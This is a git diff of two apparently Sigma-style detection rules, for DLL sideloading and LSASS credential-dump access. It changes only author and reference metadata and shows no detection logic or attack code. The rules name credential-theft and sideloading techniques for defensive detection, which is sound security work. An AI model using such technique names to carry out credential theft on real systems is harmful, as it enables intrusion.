deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index 4200548e7..704c535d8 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -3,11 +3,11 @@ id: 4fc0deee-0057-4998-ab31-d24e46e0aba4 status: experimental description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...) references: - - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there). Wietze Beukema (project and research) - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll - - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md -author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project) + - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md # XForceIR (SideLoadHunter Project), Chris Spehn (research WFH Dridex) +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 modified: 2023/01/09 tags: diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index 7fafb013e..72cbd8fee 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml @@ -7,7 +7,7 @@ references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth (Nextron Systems), Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) +author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community date: 2017/02/16 modified: 2023/01/25 tags: